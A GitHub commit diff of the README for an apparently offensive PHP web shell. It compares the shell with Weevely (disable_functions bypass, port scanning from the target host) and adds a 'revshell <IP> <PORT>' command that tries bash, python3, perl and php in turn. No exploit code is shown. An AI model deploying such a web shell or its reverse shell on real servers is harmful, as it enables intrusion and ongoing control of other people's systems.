You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
|`disable_functions` bypass | Yes — mod_cgi + `.htaccess` (Apache only, requires `AllowOverride` + write access) | No — not planned as a priority; the technique requires Apache + mod_cgi + AllowOverride + web-writable directory, which are rarely all met in prod |
| Port scan | Yes |Yes — `portscan <ip[-range]> <ports>` via fsockopen from the target host|
87
87
| SQL console | Yes | No |
88
88
89
89
**Use Weevely when**: you need CLI automation, module ecosystem (SQL, reverse shell, scan), or obfuscated HTTP transport matters more than visual camouflage.
@@ -374,6 +374,9 @@ Once deployed and authenticated, the shell supports:
374
374
|`cd /path`| Change working directory (persisted across commands) |
375
375
|`download /path/to/file`| Download file to browser |
376
376
|`upload /remote/path`| Upload local file via browser dialog |
377
+
|`revshell <IP> <PORT>`| Spawn reverse shell — tries bash, python3, perl, php in order (first available wins) |
0 commit comments